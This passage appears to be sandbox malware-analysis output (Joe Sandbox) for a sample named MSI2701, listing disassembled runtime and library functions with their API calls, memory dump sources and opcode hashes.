                                                                                                                                                              • Part of subcall function 004C8610: std::_Lockit::_Lockit.LIBCPMT ref: 004C8657
                                                                                                                                                              • Part of subcall function 004C8610: std::_Lockit::_Lockit.LIBCPMT ref: 004C8679
                                                                                                                                                              • Part of subcall function 004C8610: std::_Lockit::~_Lockit.LIBCPMT ref: 004C86A1
                                                                                                                                                              • Part of subcall function 004C8610: std::_Lockit::~_Lockit.LIBCPMT ref: 004C880E
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                                                                                            • String ID: 2N$%.0Lf
                                                                                                                                                            • API String ID: 1487807907-2843531961
                                                                                                                                                            • Opcode ID: 95f4843f76c6bfd6b89ee6156dea84ef53290be2f1e07f8064e2c4835b75d0ab
                                                                                                                                                            • Instruction ID: 6285b4b44d85a2a6766e87567d7bdeaad2cf64c2f445e85c69ad4db456ab547e
                                                                                                                                                            • Opcode Fuzzy Hash: 95f4843f76c6bfd6b89ee6156dea84ef53290be2f1e07f8064e2c4835b75d0ab
                                                                                                                                                            • Instruction Fuzzy Hash: D9418D75E00208ABCF05EFE0C854AED7BB5FF08304F20445AE855AB395DB389916DF94
                                                                                                                                                            Function 004E1887 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 128COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 004E188E
                                                                                                                                                            • _swprintf.LIBCMT ref: 004E1900
                                                                                                                                                              • Part of subcall function 004C9270: std::_Lockit::_Lockit.LIBCPMT ref: 004C92A0
                                                                                                                                                              • Part of subcall function 004C9270: std::_Lockit::_Lockit.LIBCPMT ref: 004C92C2
                                                                                                                                                              • Part of subcall function 004C9270: std::_Lockit::~_Lockit.LIBCPMT ref: 004C92EA
                                                                                                                                                              • Part of subcall function 004C9270: std::_Lockit::~_Lockit.LIBCPMT ref: 004C9422
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                                                                                            • String ID: 2N$%.0Lf
                                                                                                                                                            • API String ID: 1487807907-2843531961
                                                                                                                                                            • Opcode ID: 433fc711fdc4edefe28a1cfeb23870dc27a0c61ffebdaa6f917d2b7341d0b652
                                                                                                                                                            • Instruction ID: 978a8bf3871755553b7576374bff987791f0e3fc98b1c3d6c70c71ef313f5e9b
                                                                                                                                                            • Opcode Fuzzy Hash: 433fc711fdc4edefe28a1cfeb23870dc27a0c61ffebdaa6f917d2b7341d0b652
                                                                                                                                                            • Instruction Fuzzy Hash: 21419DB5E00308ABCF05EFD1C844ADD7BB5FF08305F20854AE845AB2A1DB799916CF98
                                                                                                                                                            Function 004D8386 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D838D
                                                                                                                                                              • Part of subcall function 004D1C42: _Maklocstr.LIBCPMT ref: 004D1C62
                                                                                                                                                              • Part of subcall function 004D1C42: _Maklocstr.LIBCPMT ref: 004D1C7F
                                                                                                                                                              • Part of subcall function 004D1C42: _Maklocstr.LIBCPMT ref: 004D1C9C
                                                                                                                                                              • Part of subcall function 004D1C42: _Maklocchr.LIBCPMT ref: 004D1CAE
                                                                                                                                                              • Part of subcall function 004D1C42: _Maklocchr.LIBCPMT ref: 004D1CC1
                                                                                                                                                            • _Mpunct.LIBCPMT ref: 004D841A
                                                                                                                                                            • _Mpunct.LIBCPMT ref: 004D8434
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                                                                            • String ID: $+xv
                                                                                                                                                            • API String ID: 2939335142-1686923651
                                                                                                                                                            • Opcode ID: 37d7fab174b896c7283cf2572148e3dd376c219168b99cbfce9cd97d2228c4ce
                                                                                                                                                            • Instruction ID: 01f6fd9e89a0fce006346fd209f1d710de9518243e45ba774c21628ba69f02fd
                                                                                                                                                            • Opcode Fuzzy Hash: 37d7fab174b896c7283cf2572148e3dd376c219168b99cbfce9cd97d2228c4ce
                                                                                                                                                            • Instruction Fuzzy Hash: 052192B1904A926ED725DF76849077BBEE8AB08705B04055FE499C7A42E738EA01CB94
                                                                                                                                                            Function 004DFFEA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Mpunct$H_prolog3
                                                                                                                                                            • String ID: $+xv
                                                                                                                                                            • API String ID: 4281374311-1686923651
                                                                                                                                                            • Opcode ID: d038d0831054adfb5b14861934a63ee362208f823b7ff0e7064f9bbd220df03d
                                                                                                                                                            • Instruction ID: 1f3941ff51af18df22663212165c6280d5148a56691b5e36c8a066a7f11972a5
                                                                                                                                                            • Opcode Fuzzy Hash: d038d0831054adfb5b14861934a63ee362208f823b7ff0e7064f9bbd220df03d
                                                                                                                                                            • Instruction Fuzzy Hash: 3621B2B1904B926ED721DF76849073BBEF8AB08305F04095FE4A9C7A42D378EA41CB94
                                                                                                                                                            Function 004C24C0 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,004C1434,?,00000000), ref: 004C2569
                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,004C1434,?,00000000), ref: 004C2589
                                                                                                                                                            • LocalFree.KERNEL32(?,004C1434,?,00000000), ref: 004C25DF
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,C7C71CC4,?,00000000,00503C40,000000FF,00000008,?,?,?,?,004C1434,?,00000000), ref: 004C2633
                                                                                                                                                            • LocalFree.KERNEL32(?,C7C71CC4,?,00000000,00503C40,000000FF,00000008,?,?,?,?,004C1434), ref: 004C2647
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Local$AllocFree$CloseHandle
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1291444452-0
                                                                                                                                                            • Opcode ID: 10773e673e9a41ab20d594d8d86460cb79a56932227c754e8a4fb11023261790
                                                                                                                                                            • Instruction ID: f56e947dcf1a8929741f95d1deb68b71abd77a7aa19cbb8d90395e4ddcd54ca3
                                                                                                                                                            • Opcode Fuzzy Hash: 10773e673e9a41ab20d594d8d86460cb79a56932227c754e8a4fb11023261790
                                                                                                                                                            • Instruction Fuzzy Hash: C541193A600215ABC3549F28D954F5BB7D8EB49360F10462FF526C73D0DBF8E9448758
                                                                                                                                                            Function 004CA910 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 377COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • LocalFree.KERNEL32(004C9C9B), ref: 004CACD1
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeLocal
                                                                                                                                                            • String ID: @TQ$@TQ$TQ
                                                                                                                                                            • API String ID: 2826327444-1854491024
                                                                                                                                                            • Opcode ID: 514a4ccc628993e3880cd607527dcf7b1aec746c0a4c97ec2a6c8134a0992cbb
                                                                                                                                                            • Instruction ID: 18e19bcae0158a25aa732e8cab819c0d5cba7e1a75e8e80f2e8be87fe8a1ffe3
                                                                                                                                                            • Opcode Fuzzy Hash: 514a4ccc628993e3880cd607527dcf7b1aec746c0a4c97ec2a6c8134a0992cbb
                                                                                                                                                            • Instruction Fuzzy Hash: 6DE19B78A0024D9FDB04CFA8C884FEEBBB5FF08308F14406EE805AB251D735A955CBA5
                                                                                                                                                            Function 00501D9B Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetConsoleOutputCP.KERNEL32(C7C71CC4,?,00000000,?), ref: 00501DFE
                                                                                                                                                              • Part of subcall function 004FA9BB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,004F6F5E,?,00000000,-00000008), ref: 004FAA67
                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00502059
                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 005020A1
                                                                                                                                                            • GetLastError.KERNEL32 ref: 00502144
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2112829910-0
                                                                                                                                                            • Opcode ID: d8795cbf3b4406f24d0231b086d0fa17838956155f492cadf62b6d4649d0a286
                                                                                                                                                            • Instruction ID: be16be93fc8d3b1f0d49c83ac798808fa0c1c93774ef97912c3db3b1ea220ceb
                                                                                                                                                            • Opcode Fuzzy Hash: d8795cbf3b4406f24d0231b086d0fa17838956155f492cadf62b6d4649d0a286
                                                                                                                                                            • Instruction Fuzzy Hash: 5BD179B5D002489FCB15CFA8D8849EDBFB9FF49310F18852AE925EB291D730A945CB50
                                                                                                                                                            Function 004F24E8 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 582fee7b1a0ca5461e6142fd6f5e8f5c84b6d72a0eb13bb5cf832419bafcd996
                                                                                                                                                            • Instruction ID: ff9da1925e02a734ea86fa2ed596af84713eb98442f8b1b258593a5623c83030
                                                                                                                                                            • Opcode Fuzzy Hash: 582fee7b1a0ca5461e6142fd6f5e8f5c84b6d72a0eb13bb5cf832419bafcd996
                                                                                                                                                            • Instruction Fuzzy Hash: DC21BE7160420EBF9B20AF62CE61C3B77A9EF44368710451BFA1587251D7B8ED009B6A
                                                                                                                                                            Function 004CCCE0 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,C7C71CC4), ref: 004CCD1C
                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 004CCD3C
                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 004CCD6D
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 004CCD86
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3604237281-0
                                                                                                                                                            • Opcode ID: 137c1a032f1b126129ba4de31ccedc3fe822b91882582bec3bd120a42d4d2385
                                                                                                                                                            • Instruction ID: 8faaba051b09c6e25350391cbaf11444b8911f8a4a20ff9b41aa8a622a7004a1
                                                                                                                                                            • Opcode Fuzzy Hash: 137c1a032f1b126129ba4de31ccedc3fe822b91882582bec3bd120a42d4d2385
                                                                                                                                                            • Instruction Fuzzy Hash: 7321B174941319ABD7208F54DC4AFAFBBB8FB09B14F10426AF515A72C0D7B46A048BE4
                                                                                                                                                            Function 00503686 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00503053,?,00000001,?,?,?,00502198,?,?,00000000), ref: 0050369D
                                                                                                                                                            • GetLastError.KERNEL32(?,00503053,?,00000001,?,?,?,00502198,?,?,00000000,?,?,?,0050271F,?), ref: 005036A9
                                                                                                                                                              • Part of subcall function 0050366F: CloseHandle.KERNEL32(FFFFFFFE,005036B9,?,00503053,?,00000001,?,?,?,00502198,?,?,00000000,?,?), ref: 0050367F
                                                                                                                                                            • ___initconout.LIBCMT ref: 005036B9
                                                                                                                                                              • Part of subcall function 00503631: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00503660,00503040,?,?,00502198,?,?,00000000,?), ref: 00503644
                                                                                                                                                            • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00503053,?,00000001,?,?,?,00502198,?,?,00000000,?), ref: 005036CE
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                                            • Opcode ID: fbce4fb065c11264f68929bad5d50d1e0b7b89407679bb51ce1b7a3dd0976df1
                                                                                                                                                            • Instruction ID: 9c7cb7116c403b62f3f713ff79eccea9c8d7381c7dcb4ac03509632bf63a85d5
                                                                                                                                                            • Opcode Fuzzy Hash: fbce4fb065c11264f68929bad5d50d1e0b7b89407679bb51ce1b7a3dd0976df1
                                                                                                                                                            • Instruction Fuzzy Hash: 2AF01536944569BBCF222F95EC0898E3F6AFF583A1F044050FE1996260C6339E20EF90
                                                                                                                                                            Function 004D86C7 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 248COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog3_ctype
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2548254987-2395104290
                                                                                                                                                            • Opcode ID: a0c7b560601abf3de5acf2606b56b6635e016a35d23f2d861cbdce3a2f30b87b
                                                                                                                                                            • Instruction ID: 1c9ce31bb9ff36b92530ca059e0c785c39d8326c518df2a8a7f0f8c63f2df331
                                                                                                                                                            • Opcode Fuzzy Hash: a0c7b560601abf3de5acf2606b56b6635e016a35d23f2d861cbdce3a2f30b87b
                                                                                                                                                            • Instruction Fuzzy Hash: B0A147759002099FCF14EF94C9A4AEEBBB9FF08314F14401FE804A7351DB38AA56DB69
                                                                                                                                                            Function 004CF13C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 246COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog3_ctype
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2548254987-2395104290
                                                                                                                                                            • Opcode ID: 9d69a16d01ce4948e8bc31564966ddaf702c07a291d45e5a4d426d6766160baf
                                                                                                                                                            • Instruction ID: c0f0f9fc7db2ab536669ae501964e5d738152d600544fd75e023fd45238c3b10
                                                                                                                                                            • Opcode Fuzzy Hash: 9d69a16d01ce4948e8bc31564966ddaf702c07a291d45e5a4d426d6766160baf
                                                                                                                                                            • Instruction Fuzzy Hash: 37A15A799002499FDF54DF94C940EEEBBBAEF08304F14046EE805A7211D779AE49CBA8
                                                                                                                                                            Function 004F1A6D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 004F1AFD
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorHandling__start
                                                                                                                                                            • String ID: pow
                                                                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                                                                            • Opcode ID: bf8e8e71e01f304b1fed62642d4c4ae3308790b87a0faead2f0b2a2ecdf2274a
                                                                                                                                                            • Instruction ID: c51964b39824dcf9ac9845cf4f85b77a9cce06973efe6a3603619a3015dc91b1
                                                                                                                                                            • Opcode Fuzzy Hash: bf8e8e71e01f304b1fed62642d4c4ae3308790b87a0faead2f0b2a2ecdf2274a
                                                                                                                                                            • Instruction Fuzzy Hash: 1D516DA1E0910DC6CB117B14C95537F2B94EB50740F20895BE699823B9FA3D8CA9EB4F
                                                                                                                                                            Function 004CD41C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog3_Initstd::locale::_
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 3382595777-2395104290
                                                                                                                                                            • Opcode ID: 4278327befb0786d28c3b4f2861ace1914a5c8b94803ca09c814acb2d25b3e39
                                                                                                                                                            • Instruction ID: f71f387aaeae9243102441bbd483caf19a65ef1f8b29c848452ebbec847b8152
                                                                                                                                                            • Opcode Fuzzy Hash: 4278327befb0786d28c3b4f2861ace1914a5c8b94803ca09c814acb2d25b3e39
                                                                                                                                                            • Instruction Fuzzy Hash: 9F71B038D04258ABCF55CFA4D550BEDBBB1AF59308F2440AEE8817B342D7386D46CB58
                                                                                                                                                            Function 004D15FB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog3_Initstd::locale::_
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 3382595777-2395104290
